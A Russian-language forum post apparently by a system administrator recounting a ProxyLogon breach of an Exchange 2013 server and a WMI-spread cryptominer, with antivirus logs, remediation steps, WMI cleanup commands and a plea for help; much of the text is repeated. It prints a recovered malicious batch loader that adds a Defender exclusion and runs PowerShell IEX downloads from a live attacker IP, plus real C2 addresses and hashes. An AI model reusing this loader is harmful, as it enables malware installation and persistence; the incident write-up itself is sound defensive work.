Размещено 04.09.2021 15:05:23
Сообщение получилось объемное, могу условно разделить его на несколько логических частей:
1. Суть инцидента (рабочая версия)
2. Описание проявлений и обнаружения
3. Предполагаемая схема лечения хостов сети (в процессе дополнения)
4. Описание и вопрос по лечению "ворот" атаки (почтовый сервер)
5. Дополнительная информация: ссылки на статьи по теме, логи детектов вирусной активности с зараженных машин
[B]1. Суть инцидента (рабочая версия):[/B]
Воспользовавшись цепочкой уязвимостей ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065) на необновленном почтовом сервере (отсутствовал мартовский патч безопасности) злоумышленники через открытый 443 порт обошли аутентификацию на сервере Exchange и получили возможность для удаленного запуска произвольного кода.
На сервер был загружен первичный веб-шелл для дальнейшего развития атаки и скомпрометированы пароли, в частности пароль локального администратора, который на всех хостах сети был одинаковый.
После осуществилось заражение хостов корпоративной сети вирусом-майнером. Антивирусы определяют его как:
[LIST]
[*]HEUR:Trojan.Multi.GenAutorunSvc.ksws [Каspersky Security for Windows Server]
[*]Trojan.Multi.GenAutorunWMI.a, Trojan.Multi.GenAutorunReg.c, PDM:Trojan.Win32.Generic [Kaspersky Cloud на клиентских машинах]
[*]PowerShellMulDrop.129 + PowerShellDownLoader.1452 [DrWeb CureIT]
[/LIST]Есть подозрение, что зловред сканирует сеть и, используя удалённое управление посредством WMI, заставляет удаленную машину скачивать с интернета и выполнять скрипты Powershell. Возможно при этом еще используется psexec.exe и уязвимость SMBv1, но это не точно.
Заражает машины с Windows 7, Server 2008, Server 2012, как физические, так и виртуальные. Компы с WinXP и Server2003 вирусу пока не интересны.
Корпоративная сеть: несколько территориально разнесенных филиалов (соединены vpn-туннелями по топологии "звезда"), два независимых леса AD и ряд не входящих не в один домен серверов/клиентских машин.
Заразились хосты как состоящие в доменах, так и вне их (скорее всего из-за того, что пароль локального администратора на всех хостах был одинаковый).
[B]2. Описание проявлений и обнаружения[/B]
Если антивирус на машине не стоит, то загрузка процессоров под 100% процессами schtasks.exe и несколькими powershell.exe
Если антивирус установлен (например, Касперский), то в логах "Мониторинг активности" содержатся регулярные записи об обнаружении/запрещении зловреда:
[I]
[/I][I]Пользователь: NT AUTHORITY\система[/I]
[I]Тип пользователя: Системный пользователь[/I]
[I]Название: PDM:Exploit.Win32.Generic[/I]
[I]Путь к объекту: c:\windows\system32[/I]
[I]Имя объекта: cmd.exe [/I]
и
[I]Путь к объекту: c:\windows\system32\wbem[/I]
[I]Имя объекта: wmiprvse.exe[/I]
На пролеченных серверах с установленным Каspersky Security for Windows Server ситуация аналогичная: нагрузка отсутствует, но установленный антивирус периодически режет попытки вылезти в интернет:
[I]Событие: Обнаружен веб-адрес.[/I]
[I]Объект: [/I][URL=http://fastrepunicat.spdns.org:8000/in6.ps1][I]http://fastrepunicat.spdns.org:8000/in6.ps1[/I][/URL][I] (или [/I][URL=http://45.10.69.139:8000/in6.ps1][I]http://45.10.69.139:8000/in6.ps1[/I][/URL][I])[/I]
[I]Имя процесса: wmiprvse.exe[/I]
Так же на ряде компов в автозагрузке было обнаружена строка c:\windows\temp\sysupdater0.bat
Антивирус при обнаружении этот файл обычно казнит ([I]У программы обнаружено подозрительное поведение, характерное для вредоносной программы:[/I]
[I]Обнаружено: PDM:Trojan.Win32.Generic[/I]), но удалось раздобыть один, вот содержимое:
[I]etlocal EnableDelayedExpansion & for /f "tokens=2 delims=.[" %%i in ('ver') do (set a=%%i)&if !a:~-1!==5 [/I]
[I]([/I]
[I] @echo on error resume next>%windir%\11.vbs&[/I]
[I] @echo Set ox=CreateObject^("MSXML2.XMLHTTP"^)>>%windir%\11.vbs&[/I]
[I] @echo ox.open "GET","[/I][URL=http://45.10.69.139:8000/info.vbs,false>>%windir%\11.vbs&][I]http://45.10.69.139:8000/info.vbs",false>>%windir%\11.vbs&[/I][/URL][I];[/I]
[I] @echo ox.send^(^)>>%windir%\11.vbs&[/I]
[I] @echo If ox.Status=200 Then>>%windir%\11.vbs&[/I]
[I] @echo Set oas=CreateObject^("ADODB.Stream"^)>>%windir%\11.vbs&[/I]
[I] @echo oas.Open>>%windir%\11.vbs&[/I]
[I] @echo oas.Type=1 >>%windir%\11.vbs&[/I]
[I] @echo oas.Write ox.ResponseBody>>%windir%\11.vbs&[/I]
[I] @echo oas.SaveToFile "%windir%\info.vbs",2 >>%windir%\11.vbs&[/I]
[I] @echo oas.Close>>%windir%\11.vbs&[/I]
[I] @echo End if>>%windir%\11.vbs&[/I]
[I] @echo Set os=CreateObject^("WScript.Shell"^)>>%windir%\11.vbs&[/I]
[I] @echo os.Exec^("cscript.exe %windir%\info.vbs"^)>>%windir%\11.vbs&[/I]
[I] cscript.exe %windir%\11.vbs[/I]
[I]) [/I]
[I]else [/I]
[I]([/I]
[I] setlocal DisableDelayedExpansion&powershell "Add-MpPreference -ExclusionProcess[/I]
[I] 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe';[/I]
[I] [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; [/I]
[I] $aa=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ))[/I]
[I] ;if(($aa -eq $null) -or !$aa.contains('SCM Event8 Log')) [/I]
[I] {[/I]
[I] if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains('64'))[/I]
[I] {[/I]
[I] IEX(New-Object Net.WebClient).DownloadString('[/I][URL=http://45.10.69.139:8000/in6.ps1][I]http://45.10.69.139:8000/in6.ps1[/I][/URL][I]')[/I]
[I] }[/I]
[I] else[/I]
[I] {[/I]
[I] IEX(New-Object Net.WebClient).DownloadString('[/I][URL=http://45.10.69.139:8000/in3.ps1][I]http://45.10.69.139:8000/in3.ps1[/I][/URL][I]')[/I]
[I] }[/I]
[I] }"[/I]
[I])[/I]
[B]3. Предполагаемая схема лечения хостов сети (в процессе дополнения):
[/B]
[LIST=1]
[*]На пограничных с интернетом устройствах запретить обращение извне на порт 8000 и адреса из диапазона 23.236.64.0-23.236.79.255 45.10.0.0 - 45.10.255.255
[*]Групповыми политиками в разделах "Компьютер" и "Пользователь" запретить выполнение .js, .ps1, .vbs, .wsc, .wsf, .wsh, .bat, .jse, .pif, .scr. Запрещено не только в политике домена, но и локально на машинах, которые в домен не входят
[*]Антивирусная проверка: сначала утилитами Drweb CurIT и/или KVRT, после проведения работ - установленным Касперским
[*]Смена пароля локального админа. Для каждого филиала свой пароль, различается для клиентов и серверов.
[*]Очистка папок C:\Windows\Temp и c:\Users\%username\AppData\Local\Temp\
[*]Очистка точек восстановления
[*]Ревизия автозагрузки при помощи autoruns (sysinternals) - на некоторых хостах был прописан sysupdater0.bat
[*]Установить все возможные обновления ОС. Патчи CVE-2019-0859 и MS17-010 ставились вручную.
[*]Сменить пароль доменного администратора
[*]Провести ревизию "левых" пользователей в домене, в приоритете в привилегированных группах
[/LIST]Отдельная сноска про смену пароля локального администратора на хостах: если пароль не сменить, то проверка и патчи не помогают. Пример: после пролечивания двумя утилитами подряд, установки патчей и полной проверки компьютера, доложившей об отсутствии угроз, этот же компьютер чуть позже уведомил, что в системной памяти обнаружен Trojan.Multi.GenAutorunReg.c.
Данные пункты были осуществлены в двух филиалах, после чего в логах антивируса на хостах этих филиалов прекратились детекты зловредов и попыток вылезти в интернет.
Есть еще ряд пунктов, которые посоветовали неравнодушные люди, но я их еще не обкатывал на практике, поэтому приводить в данном сообщении не буду.
После проверки отпишусь в теме и дополню алгоритм решения инцидента.
Пока могу упомянуть следующее: на зараженных хостах, с которых было зафиксировано обращение по вредоносным адресам, обнаружены службы с произвольными именами (например LFRJLAFYBRJFQEBBLCCB или YVRDGSBWEDTLLHHLUKXW).
Есть мнение, основное заражение происходит через wmi подписки и классы, а они уже раскатывают все остальные службы и т.п.
В системе зафиксированы вредоносные классы в корне root\default и root\Subscription.
В результате антивирусной проверки Касперский должен их удалять, но случается так, что по каким-то причинам вредонос остаётся.
Команды по поиску и удалению вредоносных классов (запускаются в PowerShell, должны подходить для всех ОС с powershell 2.0 и выше):
[I]Get-WmiObject -Namespace root\Default -List | where {$_.Name -eq'systemcore_Updater'} | Remove-WmiObject -Verbose[/I]
Если после лечения все равно все равно детекты или не удаление:
[LIST]
[*]Имя объекта: WMI-Consumer:SCM Event8 Log Consumer
[*]Имя объекта: WMI-Consumer:SCM Event8 Log Consumer2
[/LIST]Команды удаления:
[LIST]
[*]Get-WMIObject -Namespace root\Subscription -Class __EventFilter -filter "Name= 'SCM Event Log Filter'" | Remove-WMIObject -Verbose
[*]Get-WMIObject -Namespace root\Subscription -ClassCommandLineEventConsumer -Filter "Name='SCM Events Log Consumer'" |Remove-WMIObject -Verbose
[*]Get-WMIObject -Namespace root\Subscription -Class __EventFilter -filter "Name= 'SCM Event Log Filter2'" | Remove-WMIObject -Verbose
[*]Get-WMIObject -Namespace root\Subscription -ClassCommandLineEventConsumer -Filter "Name='SCM Events Log Consumer2'" |Remove-WMIObject -Verbose
[/LIST]Планирую эти команды прокатать на всех хостах организации, для душевного спокойствия.
[B]4. Описание и вопрос по лечению "ворот" атаки (почтовый сервер)[/B]
Остался ключевой момент - почтовый сервер, с которого предположительно всё началось и на котором до сих пор сидит зловред.
Машина с Windows Server 2012r2 Exchange 2013 (version 15.0 (build 1497.2)).
Установлен Каspersky Security for Windows Server, на днях установили мартовский патч безопасности Exchange Server 2013 Cumulative Update 23.
Казалось бы, уязвимость закрыта и можно выдохнуть.
Но нет.
Касперский в журнале безопасности каждые три часа пишет о семи файлах-вредоносах - одна dll, семь aspx.
При запуске быстрой проверки или полной проверки антивирус их не находит.
И команда PowerShell их не находит.
Из чего можно предположить, что они по команде/расписанию возникают, а в процессе активности их гасит антивирус.
Значит, их команда на их "зарождение" прописана где-то в системе.
В рамках диагностики на почтовике скачали и запустили скрипт, который ищет в логах события с потенциальным пробивом и левые записи в конфигурации, которые могут быть этим источником создания вредоносных файлов.
[URL=https://github.com/microsoft/CSS-Exchange/blob/main/Security/src/Test-ProxyLogon.ps1]https://github.com/microsoft/CSS-Exchange/blob/main/Security/src/Test-ProxyLogon.ps1[/URL]
Команда:
[I].\Test-ProxyLogon.ps1 -OutPath $home\desktop\logs\[/I]
Результат команды:
[COLOR=#ff0000][CVE-2021-26855] Suspicious activity found in Http Proxy log [/COLOR]
Получается, что либо патч уязвимость не закрыл, либо встал криво, либо я не знаю что.
Еще из странностей, связанных с почтовиком:
[LIST=1]
[*]Несостыковка номера версии патча, установленного в системе (15.0.1497.2) с тем, который по идее должен был быть (15.01.1497.23). На сайте Микрософта указано, что версия "15.0.1497.2" от 18.06.2019, а "15.01.1497.23" - от 13.07.2021. На всякий случай вчера скачали новый файл, уже по другой ссылке Микрософт, в свойствах файла на вкладке "Подробно" указано "Security Update for Exchange Server 2013 Cumulative Update 23 (KB5004778)15.0.1497.23. Запустили установку (не удаляя предыдущий патч), прошла без вопросов, перезагрузили - номер версии остался без изменений. Чудеса в решете.
[*]Не запускается оснастка Exchange Toolbox. Пишет "Консоль управленич (MMC) обнаружила ошибку оснастки, поэтому оснастка будет выгружена", следующее окно "Необрабатывемое исключение в оснастке управляемого..." Очистка кэша оснастки (AppData\Roaming\Microsoft\MMC\Exchange Toolbox) не помогает.
[/LIST][B]А теперь, собственно, суть обращения: как забороть зловреда на почтовике?
[/B]Что-то я упускаю из вида, а что - непонятно.
Заранее благодарю.
Сообщения о детектах из Журнала Касперского с почтового сервера:
[I]Обнаружен возможно зараженный объект: Троянская программа HEUR:Backdoor.MSIL.Webshell.gen.[/I]
[I]Имя объекта: App_Web_r0zdr.aspx.f5dba9b9.d7wo2roq.dll [/I]
[I]MD5 хеш файла: e91aa8fb8225d5e019311d67774f1946[/I]
[I]Хеш SHA256 файла: e3614efab364abe01dd98d92e61d6a73decc9ad87e9d6ce14059581e4ca4ccc2[/I]
[I]Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.[/I]
[I]Имя объекта: log.aspx [/I]
[I]MD5 хеш файла: f0520236bf9c8c73f199a244d029a49f[/I]
[I]Хеш SHA256 файла: 264f9bf852f2c00eb804050861da39b78c1720dc5f77e08dc484dde0a85430eb[/I]
[I]Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.[/I]
[I]Имя объекта: RXT7WB.aspx [/I]
[I]MD5 хеш файла: c2b67fb32ef0953722ea437295be386b[/I]
[I]Хеш SHA256 файла: b4d02ac0e79ca6376416f52c30a82d8b72efcb8966640f3dbf5b22f67e6075b9[/I]
[I]Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.[/I]
[I]Имя объекта: dgFfuh.aspx [/I]
[I]MD5 хеш файла: 0418b10fdf926066fa6a19e83332e34e[/I]
[I]Хеш SHA256 файла: 59720c4ae289ab2a8336a1cd24fbfb2a24478e1ed88d517725999751e510b97a[/I]
[I]Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.[/I]
[I]Имя объекта: 7r3q2.aspx [/I]
[I]MD5 хеш файла: dbb0576553870e07f8220386b5989cdb[/I]
[I]Хеш SHA256 файла: 6377ada51e66550bafda31038897ed13be71f928dabbefd657a1d3b8be672237[/I]
[I]Обнаружен возможно зараженный объект: Троянская программа HEUR:Exploit.Script.CVE-2021-26855.gen.[/I]
[I]Имя объекта: log.aspx [/I]
[I]MD5 хеш файла: f0520236bf9c8c73f199a244d029a49f[/I]
[I]Хеш SHA256 файла: 264f9bf852f2c00eb804050861da39b78c1720dc5f77e08dc484dde0a85430eb[/I]
[B]5. Дополнительная информация: ссылки на статьи по теме, логи детектов вирусной активности с зараженных машин[/B]
Злоумышленники активно эксплуатируют уязвимости в MS Exchange
[URL=https://www.kaspersky.ru/blog/exchange-vulnerabilities/30228/]https://www.kaspersky.ru/blog/exchange-vulnerabilities/30228/[/URL]
Handling a distributed cryptominer AD worm
[URL=https://www.certego.net/en/news/handling-a-destributed-cryptominer-ad-worm/]https://www.certego.net/en/news/handling-a-destributed-cryptominer-ad-worm/[/URL]
Далее привожу примеры из журналов безопасности антивирусов в качестве дополнительной информации и для индексации поисковых систем, т.к. в процессе поиска причин и вариантов решения я внятного алгоритма решения не нашел. Возможно найденные варианты решения окажутся полезными кому-нибудь еще.
Если на зараженной машине, на которой не стоит антивирус, запустить DrWeb CureIT, то обнаруживаются обычно следующие угрозы (пример с конкретной машины):
[I]Объект: powershell.exe[/I]
[I]Угроза: PowerShellDownLoader.1452[/I]
[I]Путь: \Process\4288\Device\HarddiskVolume2\Windows\System32\WindowsPoweShell\v1.0\powershell.exe[/I]
[I]Объект: CommandLineTemplate[/I]
[I]Угроза: PowerShellMulDrop.129[/I]
[I]Путь: \WMI\root\subscription\CommandLineEventConsumer{266c72e5-62e8-11d1-ad89-00c04fd8fdff}\CommandLineTemplate[/I]
powershell.exe может быть несколько, CommandLineTemplate обычно один.
После пролечивания утилитой DrWeb CureIT "паразитные" процессы исчезают, но через какое-то время снова происходит заражение и последующая загрузка мощностей машины.
В рамках борьбы с заражением на сервера установлены Каspersky Security for Windows Server 11.0.1.897
После установки, активации, обновления баз и включения KSN запускалась "Проверка важных областей" с настройками "по умолчанию" (Действия над зараженными и другими обнаруженными объектами: Выполнять рекомендуемое действие).
Находилось следующее:
[I]Обнаружен объект: Потенциальная уязвимость HEUR:Trojan.Multi.GenAutorunSvc.ksws.[/I]
[I]Имя объекта: WMIService:BVMFJGIVCEOAWSUOYQTH [/I]
После последующей перезагрузки сервера в диспетчере задач всё выглядит прилично и "лишние" процессы не грузят систему.
Но в "Событиях" задачи "Постоянная защита файлов" постоянно появляются блоки новых записей с пометкой "Уровень важности: Критический".
Блок сообщений с одного из серверов:
[I]Время: 26.08.2021 2:06:54[/I]
[I]Обнаружен объект: Потенциальная уязвимость HEUR:Trojan.Multi.GenAutorunWmi.ksws.[/I]
[I]Имя объекта: WMI-Consumer:SCM Event8 Log Consumer [/I]
[I]Время: 26.08.2021 2:06:55[/I]
[I]Обнаружен объект: Потенциальная уязвимость HEUR:Trojan.Multi.GenAutorunWmi.ksws.[/I]
[I]Имя объекта: WMI-Consumer:SCM Event8 Log Consumer2 [/I]
[I]Время: 26.08.2021 2:50:51[/I]
[I]Обнаружен веб-адрес. .[/I]
[I]Имя объекта: [/I][URL=http://45.10.69.139:8000/in6.ps1][I]http://45.10.69.139:8000/in6.ps1[/I][/URL]
[I]Компьютер: network[/I]
[I]Пользователь: KR-TERM\Администратор[/I]
[I]Имя процесса: wmiprvse.exe[/I]
[I]Время: 26.08.2021 6:55:28[/I]
[I]Обнаружен веб-адрес. .[/I]
[I]Имя объекта: [/I][URL=http://45.10.69.139:8000/in6.ps1][I]http://45.10.69.139:8000/in6.ps1[/I][/URL][I] [/I]
[I]Компьютер: network[/I]
[I]Пользователь: KR-TERM\Администратор[/I]
[I]Имя процесса: wmiprvse.exe[/I]
На других серверах дополнительно появлялись сообщения с другими пользователями и процессом:
[I]Обнаружен веб-адрес. .[/I]
[I]Имя объекта: [/I][URL=http://45.10.69.139:8000/in6.ps1][I]http://45.10.69.139:8000/in6.ps1[/I][/URL]
[I]Компьютер: localhost[/I]
[I]Пользователь: WORKGROUP\FIL-T2$[/I]
[I]Имя процесса: services.exe[/I]
[I]Процесс терминирован: обнаружена попытка эксплуатации уязвимости. Причина: в защищаемом процессе другой процесс создал поток управления.[/I]
[I]Имя объекта: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe[/I]
[I]Компьютер: VIRTUALMACHINE[/I]
[I]Пользователь: VIRTUALMACHINE\Администратор[/I]
[I]Имя процесса: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe[/I]
[I]Обнаружен объект: Троянская программа Trojan.Win32.Shelma.arzd.[/I]
[I]Имя объекта: C:\Windows\System32\mue.exe [/I]
[I]MD5 хеш файла: d1aed5a1726d278d521d320d082c3e1e[/I]
[I]Хеш SHA256 файла: 0a1cdc92bbb77c897723f21a376213480fd3484e45bda05aa5958e84a7c2edff[/I]
[I]Компьютер: network[/I]
[I]Пользователь: VIRTUALMACHINE\Администратор[/I]
1. Суть инцидента (рабочая версия)
2. Описание проявлений и обнаружения
3. Предполагаемая схема лечения хостов сети (в процессе дополнения)
4. Описание и вопрос по лечению "ворот" атаки (почтовый сервер)
5. Дополнительная информация: ссылки на статьи по теме, логи детектов вирусной активности с зараженных машин
[B]1. Суть инцидента (рабочая версия):[/B]
Воспользовавшись цепочкой уязвимостей ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065) на необновленном почтовом сервере (отсутствовал мартовский патч безопасности) злоумышленники через открытый 443 порт обошли аутентификацию на сервере Exchange и получили возможность для удаленного запуска произвольного кода.
На сервер был загружен первичный веб-шелл для дальнейшего развития атаки и скомпрометированы пароли, в частности пароль локального администратора, который на всех хостах сети был одинаковый.
После осуществилось заражение хостов корпоративной сети вирусом-майнером. Антивирусы определяют его как:
[LIST]
[*]HEUR:Trojan.Multi.GenAutorunSvc.ksws [Каspersky Security for Windows Server]
[*]Trojan.Multi.GenAutorunWMI.a, Trojan.Multi.GenAutorunReg.c, PDM:Trojan.Win32.Generic [Kaspersky Cloud на клиентских машинах]
[*]PowerShellMulDrop.129 + PowerShellDownLoader.1452 [DrWeb CureIT]
[/LIST]Есть подозрение, что зловред сканирует сеть и, используя удалённое управление посредством WMI, заставляет удаленную машину скачивать с интернета и выполнять скрипты Powershell. Возможно при этом еще используется psexec.exe и уязвимость SMBv1, но это не точно.
Заражает машины с Windows 7, Server 2008, Server 2012, как физические, так и виртуальные. Компы с WinXP и Server2003 вирусу пока не интересны.
Корпоративная сеть: несколько территориально разнесенных филиалов (соединены vpn-туннелями по топологии "звезда"), два независимых леса AD и ряд не входящих не в один домен серверов/клиентских машин.
Заразились хосты как состоящие в доменах, так и вне их (скорее всего из-за того, что пароль локального администратора на всех хостах был одинаковый).
[B]2. Описание проявлений и обнаружения[/B]
Если антивирус на машине не стоит, то загрузка процессоров под 100% процессами schtasks.exe и несколькими powershell.exe
Если антивирус установлен (например, Касперский), то в логах "Мониторинг активности" содержатся регулярные записи об обнаружении/запрещении зловреда:
[I]
[/I][I]Пользователь: NT AUTHORITY\система[/I]
[I]Тип пользователя: Системный пользователь[/I]
[I]Название: PDM:Exploit.Win32.Generic[/I]
[I]Путь к объекту: c:\windows\system32[/I]
[I]Имя объекта: cmd.exe [/I]
и
[I]Путь к объекту: c:\windows\system32\wbem[/I]
[I]Имя объекта: wmiprvse.exe[/I]
На пролеченных серверах с установленным Каspersky Security for Windows Server ситуация аналогичная: нагрузка отсутствует, но установленный антивирус периодически режет попытки вылезти в интернет:
[I]Событие: Обнаружен веб-адрес.[/I]
[I]Объект: [/I][URL=http://fastrepunicat.spdns.org:8000/in6.ps1][I]http://fastrepunicat.spdns.org:8000/in6.ps1[/I][/URL][I] (или [/I][URL=http://45.10.69.139:8000/in6.ps1][I]http://45.10.69.139:8000/in6.ps1[/I][/URL][I])[/I]
[I]Имя процесса: wmiprvse.exe[/I]
Так же на ряде компов в автозагрузке было обнаружена строка c:\windows\temp\sysupdater0.bat
Антивирус при обнаружении этот файл обычно казнит ([I]У программы обнаружено подозрительное поведение, характерное для вредоносной программы:[/I]
[I]Обнаружено: PDM:Trojan.Win32.Generic[/I]), но удалось раздобыть один, вот содержимое:
[I]etlocal EnableDelayedExpansion & for /f "tokens=2 delims=.[" %%i in ('ver') do (set a=%%i)&if !a:~-1!==5 [/I]
[I]([/I]
[I] @echo on error resume next>%windir%\11.vbs&[/I]
[I] @echo Set ox=CreateObject^("MSXML2.XMLHTTP"^)>>%windir%\11.vbs&[/I]
[I] @echo ox.open "GET","[/I][URL=http://45.10.69.139:8000/info.vbs,false>>%windir%\11.vbs&][I]http://45.10.69.139:8000/info.vbs",false>>%windir%\11.vbs&[/I][/URL][I];[/I]
[I] @echo ox.send^(^)>>%windir%\11.vbs&[/I]
[I] @echo If ox.Status=200 Then>>%windir%\11.vbs&[/I]
[I] @echo Set oas=CreateObject^("ADODB.Stream"^)>>%windir%\11.vbs&[/I]
[I] @echo oas.Open>>%windir%\11.vbs&[/I]
[I] @echo oas.Type=1 >>%windir%\11.vbs&[/I]
[I] @echo oas.Write ox.ResponseBody>>%windir%\11.vbs&[/I]
[I] @echo oas.SaveToFile "%windir%\info.vbs",2 >>%windir%\11.vbs&[/I]
[I] @echo oas.Close>>%windir%\11.vbs&[/I]
[I] @echo End if>>%windir%\11.vbs&[/I]
[I] @echo Set os=CreateObject^("WScript.Shell"^)>>%windir%\11.vbs&[/I]
[I] @echo os.Exec^("cscript.exe %windir%\info.vbs"^)>>%windir%\11.vbs&[/I]
[I] cscript.exe %windir%\11.vbs[/I]
[I]) [/I]
[I]else [/I]
[I]([/I]
[I] setlocal DisableDelayedExpansion&powershell "Add-MpPreference -ExclusionProcess[/I]
[I] 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe';[/I]
[I] [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; [/I]
[I] $aa=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ))[/I]
[I] ;if(($aa -eq $null) -or !$aa.contains('SCM Event8 Log')) [/I]
[I] {[/I]
[I] if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains('64'))[/I]
[I] {[/I]
[I] IEX(New-Object Net.WebClient).DownloadString('[/I][URL=http://45.10.69.139:8000/in6.ps1][I]http://45.10.69.139:8000/in6.ps1[/I][/URL][I]')[/I]
[I] }[/I]
[I] else[/I]
[I] {[/I]
[I] IEX(New-Object Net.WebClient).DownloadString('[/I][URL=http://45.10.69.139:8000/in3.ps1][I]http://45.10.69.139:8000/in3.ps1[/I][/URL][I]')[/I]
[I] }[/I]
[I] }"[/I]
[I])[/I]
[B]3. Предполагаемая схема лечения хостов сети (в процессе дополнения):
[/B]
[LIST=1]
[*]На пограничных с интернетом устройствах запретить обращение извне на порт 8000 и адреса из диапазона 23.236.64.0-23.236.79.255 45.10.0.0 - 45.10.255.255
[*]Групповыми политиками в разделах "Компьютер" и "Пользователь" запретить выполнение .js, .ps1, .vbs, .wsc, .wsf, .wsh, .bat, .jse, .pif, .scr. Запрещено не только в политике домена, но и локально на машинах, которые в домен не входят
[*]Антивирусная проверка: сначала утилитами Drweb CurIT и/или KVRT, после проведения работ - установленным Касперским
[*]Смена пароля локального админа. Для каждого филиала свой пароль, различается для клиентов и серверов.
[*]Очистка папок C:\Windows\Temp и c:\Users\%username\AppData\Local\Temp\
[*]Очистка точек восстановления
[*]Ревизия автозагрузки при помощи autoruns (sysinternals) - на некоторых хостах был прописан sysupdater0.bat
[*]Установить все возможные обновления ОС. Патчи CVE-2019-0859 и MS17-010 ставились вручную.
[*]Сменить пароль доменного администратора
[*]Провести ревизию "левых" пользователей в домене, в приоритете в привилегированных группах
[/LIST]Отдельная сноска про смену пароля локального администратора на хостах: если пароль не сменить, то проверка и патчи не помогают. Пример: после пролечивания двумя утилитами подряд, установки патчей и полной проверки компьютера, доложившей об отсутствии угроз, этот же компьютер чуть позже уведомил, что в системной памяти обнаружен Trojan.Multi.GenAutorunReg.c.
Данные пункты были осуществлены в двух филиалах, после чего в логах антивируса на хостах этих филиалов прекратились детекты зловредов и попыток вылезти в интернет.
Есть еще ряд пунктов, которые посоветовали неравнодушные люди, но я их еще не обкатывал на практике, поэтому приводить в данном сообщении не буду.
После проверки отпишусь в теме и дополню алгоритм решения инцидента.
Пока могу упомянуть следующее: на зараженных хостах, с которых было зафиксировано обращение по вредоносным адресам, обнаружены службы с произвольными именами (например LFRJLAFYBRJFQEBBLCCB или YVRDGSBWEDTLLHHLUKXW).
Есть мнение, основное заражение происходит через wmi подписки и классы, а они уже раскатывают все остальные службы и т.п.
В системе зафиксированы вредоносные классы в корне root\default и root\Subscription.
В результате антивирусной проверки Касперский должен их удалять, но случается так, что по каким-то причинам вредонос остаётся.
Команды по поиску и удалению вредоносных классов (запускаются в PowerShell, должны подходить для всех ОС с powershell 2.0 и выше):
[I]Get-WmiObject -Namespace root\Default -List | where {$_.Name -eq'systemcore_Updater'} | Remove-WmiObject -Verbose[/I]
Если после лечения все равно все равно детекты или не удаление:
[LIST]
[*]Имя объекта: WMI-Consumer:SCM Event8 Log Consumer
[*]Имя объекта: WMI-Consumer:SCM Event8 Log Consumer2
[/LIST]Команды удаления:
[LIST]
[*]Get-WMIObject -Namespace root\Subscription -Class __EventFilter -filter "Name= 'SCM Event Log Filter'" | Remove-WMIObject -Verbose
[*]Get-WMIObject -Namespace root\Subscription -ClassCommandLineEventConsumer -Filter "Name='SCM Events Log Consumer'" |Remove-WMIObject -Verbose
[*]Get-WMIObject -Namespace root\Subscription -Class __EventFilter -filter "Name= 'SCM Event Log Filter2'" | Remove-WMIObject -Verbose
[*]Get-WMIObject -Namespace root\Subscription -ClassCommandLineEventConsumer -Filter "Name='SCM Events Log Consumer2'" |Remove-WMIObject -Verbose
[/LIST]Планирую эти команды прокатать на всех хостах организации, для душевного спокойствия.
[B]4. Описание и вопрос по лечению "ворот" атаки (почтовый сервер)[/B]
Остался ключевой момент - почтовый сервер, с которого предположительно всё началось и на котором до сих пор сидит зловред.
Машина с Windows Server 2012r2 Exchange 2013 (version 15.0 (build 1497.2)).
Установлен Каspersky Security for Windows Server, на днях установили мартовский патч безопасности Exchange Server 2013 Cumulative Update 23.
Казалось бы, уязвимость закрыта и можно выдохнуть.
Но нет.
Касперский в журнале безопасности каждые три часа пишет о семи файлах-вредоносах - одна dll, семь aspx.
При запуске быстрой проверки или полной проверки антивирус их не находит.
И команда PowerShell их не находит.
Из чего можно предположить, что они по команде/расписанию возникают, а в процессе активности их гасит антивирус.
Значит, их команда на их "зарождение" прописана где-то в системе.
В рамках диагностики на почтовике скачали и запустили скрипт, который ищет в логах события с потенциальным пробивом и левые записи в конфигурации, которые могут быть этим источником создания вредоносных файлов.
[URL=https://github.com/microsoft/CSS-Exchange/blob/main/Security/src/Test-ProxyLogon.ps1]https://github.com/microsoft/CSS-Exchange/blob/main/Security/src/Test-ProxyLogon.ps1[/URL]
Команда:
[I].\Test-ProxyLogon.ps1 -OutPath $home\desktop\logs\[/I]
Результат команды:
[COLOR=#ff0000][CVE-2021-26855] Suspicious activity found in Http Proxy log [/COLOR]
Получается, что либо патч уязвимость не закрыл, либо встал криво, либо я не знаю что.
Еще из странностей, связанных с почтовиком:
[LIST=1]
[*]Несостыковка номера версии патча, установленного в системе (15.0.1497.2) с тем, который по идее должен был быть (15.01.1497.23). На сайте Микрософта указано, что версия "15.0.1497.2" от 18.06.2019, а "15.01.1497.23" - от 13.07.2021. На всякий случай вчера скачали новый файл, уже по другой ссылке Микрософт, в свойствах файла на вкладке "Подробно" указано "Security Update for Exchange Server 2013 Cumulative Update 23 (KB5004778)15.0.1497.23. Запустили установку (не удаляя предыдущий патч), прошла без вопросов, перезагрузили - номер версии остался без изменений. Чудеса в решете.
[*]Не запускается оснастка Exchange Toolbox. Пишет "Консоль управленич (MMC) обнаружила ошибку оснастки, поэтому оснастка будет выгружена", следующее окно "Необрабатывемое исключение в оснастке управляемого..." Очистка кэша оснастки (AppData\Roaming\Microsoft\MMC\Exchange Toolbox) не помогает.
[/LIST][B]А теперь, собственно, суть обращения: как забороть зловреда на почтовике?
[/B]Что-то я упускаю из вида, а что - непонятно.
Заранее благодарю.
Сообщения о детектах из Журнала Касперского с почтового сервера:
[I]Обнаружен возможно зараженный объект: Троянская программа HEUR:Backdoor.MSIL.Webshell.gen.[/I]
[I]Имя объекта: App_Web_r0zdr.aspx.f5dba9b9.d7wo2roq.dll [/I]
[I]MD5 хеш файла: e91aa8fb8225d5e019311d67774f1946[/I]
